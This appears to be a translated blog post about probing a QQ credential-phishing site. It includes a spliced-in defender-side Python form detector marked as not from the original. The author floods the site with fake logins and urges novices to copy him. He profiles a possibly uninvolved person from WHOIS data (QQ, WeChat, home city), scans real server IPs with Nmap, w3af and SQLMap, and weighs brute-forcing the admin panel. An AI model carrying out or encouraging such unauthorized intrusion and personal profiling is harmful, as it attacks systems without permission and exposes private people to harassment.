Preface:

This post is not about showing off skills, as some of the movers and shakers in the comments section think, but about popularizing some useful infiltration tools and methods that I am sure not all of you have used.

I had just read an article on Zhihu, "This is how your QQ number gets stolen!", which briefly mentions a fake LOL site, uvu.cc/ixMJ. That is clearly a link-shortening address; when opened, it redirects to another site.

The page looks like this:

![image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/beed2dea5b2a4b0f832d5141c034009b~tplv-k3u1fbpfcp-zoom-1.image)

Clicking "login" pops up a dialog asking for a QQ number and password. I typed something at random and, remarkably, it "logged in". This is clearly nothing more than a simple credential-theft site.

![image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/c1d278dff59f4f4a951ea16265dc2880~tplv-k3u1fbpfcp-zoom-1.image)

What I am very curious about is this: with people's security awareness as high as it is now, can such a low-level credential-theft site still fool anyone?

Never mind. Out of habit I opened the browser developer tools to look at how the credential theft is POSTed. It turns out the form POSTs to this address:

http://mfspfgp.top/lollove.php

There are only two parameters: name and pass.
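As an added defender-side example (not code from the original post), here is a small Python check for the pattern just described: a login page whose form submits a password field to a host other than the page's own origin. The page origin lol-event.example is a placeholder assumption and the sample HTML is constructed; only the collector URL and the two field names come from the post.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a lookalike login page whose form submits the QQ credentials
# to the collector endpoint named in the post. The page origin is a placeholder.
PAGE_URL = "http://lol-event.example/index.html"
SAMPLE_HTML = """
<form method="post" action="http://mfspfgp.top/lollove.php">
  <input type="text" name="name">
  <input type="password" name="pass">
  <input type="submit" value="Login">
</form>
<form method="get" action="/search"><input name="q"></form>
"""

class FormCollector(HTMLParser):
    """Records every <form> with its action, method and (type, name) inputs."""
    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = {"action": a.get("action") or "",
                         "method": (a.get("method") or "get").lower(),
                         "inputs": []}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None:
            self._cur["inputs"].append(((a.get("type") or "text").lower(),
                                        a.get("name") or ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

def find_credential_exfil_forms(html, page_url):
    """Return (method, target_host, field_names) for each form that contains a
    password field and submits it to a host other than the page's own."""
    parser = FormCollector()
    parser.feed(html)
    page_host = urlsplit(page_url).hostname
    findings = []
    for f in parser.forms:
        if not any(t == "password" for t, _ in f["inputs"]):
            continue  # no credential field, not interesting here
        target_host = urlsplit(urljoin(page_url, f["action"])).hostname
        if target_host != page_host:
            findings.append((f["method"], target_host,
                             [n for _, n in f["inputs"] if n]))
    return findings
```

A same-origin login form (action "/login") produces no finding, so the check flags only forms that carry a password off the page's own host.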

![image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/4a070debe769482b96bee586c0b265ae~tplv-k3u1fbpfcp-zoom-1.image)

With the POST URL and parameters in hand, you can use Python to forge browser headers, generate random QQ numbers and passwords, and then use requests to POST junk data to the server repeatedly. After all, the main purpose is to alert the webmaster, so the amount of data is small, around 10000 records, and I was too lazy to add IP proxies or multi-threaded concurrency.

![image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/d5e149a1d7784da3ba14911488dd1936~tplv-k3u1fbpfcp-zoom-1.image)

The code is running. I encourage everyone (especially novices) to use similar methods to inject some junk into such sites. I imagine the phishing masters will be devastated when they see the junk data in their database, coming from many different IP addresses.

![image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/67c0edf0420949e9b6e75cd73641fd37~tplv-k3u1fbpfcp-zoom-1.image)

All right, let's just keep it running and see whether we can dig up something else.

Note:

The phishing site does not necessarily write the account and password into a database, and even if it does, there is not necessarily a page that displays them, so XSS is very difficult here.

Moreover, the site may also save the data by sending emails or writing text files. Mailbox systems are patched quickly these days, so XSS is not easy to pull off there either. Someone said in the comments that XSS is very easy; please tell us the specific implementation method, thank you very much!

Pinging the domain name (mfspfgp.top) gives the server's IP address (103.98.114.75).

![image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/d7a55a75edfd466cb3b6c09a886e8821~tplv-k3u1fbpfcp-zoom-1.image)

Looking up this address shows it is a Hong Kong server, which is understandable: only a domain without ICP filing would dare to be hosted on an overseas server.

![image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/8c946241f9854aa48868e2227002e580~tplv-k3u1fbpfcp-zoom-1.image)

Checking the WHOIS information for this domain gave me a QQ mailbox and a mobile phone number. Of course, neither contact detail is necessarily genuine.

![image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/8cad9625ba73437eb99644b36d43108e~tplv-k3u1fbpfcp-zoom-1.image)

Searching this QQ number in QQ shows a young man from Ji'an, Jiangxi, whose QQ Zone is public. Looking inside, I found nothing of value, only that this lad likes playing League of Legends and Honor of Kings.

![image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/ef8f91a7bae04c2ca0a3b24451b37e2c~tplv-k3u1fbpfcp-zoom-1.image)

Searching for the QQ number and its corresponding QQ mailbox on a search engine turned up nothing of value either, so this QQ number is probably not the owner of the phishing site; it is more likely an account stolen by the site itself.

A search on WeChat shows the location as Luoyang, Henan Province, and the WeChat profile picture appears to be the person himself. But I am not sure he owns the site, so I will not show his picture.

![image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/0d30be79910746b897c0d1f653073366~tplv-k3u1fbpfcp-zoom-1.image)

After that, I used a reverse mailbox lookup tool to check which other websites this mailbox had registered. It found 9 sites, 6 of which could still be accessed normally.

![image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/6f44dc7742f14cb4a918f5f3a7af548e~tplv-k3u1fbpfcp-zoom-1.image)

The six accessible sites are:

fjkskda.top, jligyts.top, pfdqlq.top, yiqilin.top, zykjgkd.top, mfspfgp.top

They correspond to three variants of the fraud page: "Birthday wishes", "Cool Show summer" and the "2017 competition officially starts" page shown above. The last two pages look as follows:

The credential-theft logic of all three pages is the same, so while I was at it I pointed the program above at the other sites as well. No need to thank me, my name is Lei Feng ~

After pinging all the addresses above to collect their IP addresses, I chose the IP with the most detailed physical location to try.

![image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/23b0eb45128b4417918f68f5cfc2c29f~tplv-k3u1fbpfcp-zoom-1.image)

First, searching the IP address in WhatWeb shows that the website runs nginx 1.8.1 with PHP 5.5.38.

![image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/ed8dd1f2d83540d99539479068e71307~tplv-k3u1fbpfcp-zoom-1.image)

Then I used Nmap to scan the ports and running services, and found that there are quite a number of open ports.

![image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/fb1dd19e7ccb46d2be8a879b762edf35~tplv-k3u1fbpfcp-zoom-1.image)

```
PORT      STATE SERVICE
1/tcp     open  tcpmux
3/tcp     open  compressnet
4/tcp     open  unknown
6/tcp     open  unknown
7/tcp     open  echo
9/tcp     open  discard
... omitted ...
61900/tcp open  unknown
62078/tcp open  iphone-sync
63331/tcp open  unknown
64623/tcp open  unknown
64680/tcp open  unknown
65000/tcp open  unknown
65129/tcp open  unknown
65389/tcp open  unknown
```

(As an aside: the iphone-sync service on port 62078 feels a bit like Apple sync. Note that names such as tcpmux, echo and iphone-sync are only nmap's default labels for those port numbers, not verified services; when a host reports this many low-numbered ports open, something in front of it is often answering every connection attempt, so the list should be treated with caution.)

W3af was then used to probe the site for weaknesses and collect some important information. For some reason w3af threw a thread error on this run, so the scan did not complete; fortunately, it still turned up one sensitive link: http://103.27.176.227/OGeU3BGx.php.

![image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/88aff8c269ad4c3394b8f19fd44813ea~tplv-k3u1fbpfcp-zoom-1.image)

Visiting the link in a browser gives an error page, but one key message appears at the bottom: Powered by WDCP

![image.png](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/49249253c47947f3a5b8e002da0468cb~tplv-k3u1fbpfcp-zoom-1.image)

Clicking on WDCP leads to its official page, where you will find the following important information, as well as a thoughtfully provided demo site:

demo.wdlinux.cn, which you can try.

![image](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/7af1bf25af1e435aabcb3327782e3786~tplv-k3u1fbpfcp-zoom-1.image)

This is the admin panel address of the phishing site:

http://103.27.176.227:8080

![image](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/bd3e897fb390490cbc9b327739ead3b4~tplv-k3u1fbpfcp-zoom-1.image)

In addition, I tried the demo site and found that when changing the password, the user name is always admin and cannot be changed; on top of that, the login page has no captcha, so I guess brute force could be attempted.

![image](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/be5fbc4ec5af4ccaaa2f5108a8b4ab9f~tplv-k3u1fbpfcp-zoom-1.image)

I scanned the login form for injection points with SQLMap and found none.

![image](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/1d2419d4c9144464bac2344d86c44601~tplv-k3u1fbpfcp-zoom-1.image)

Is brute-forcing the password really the only way in? Still thinking...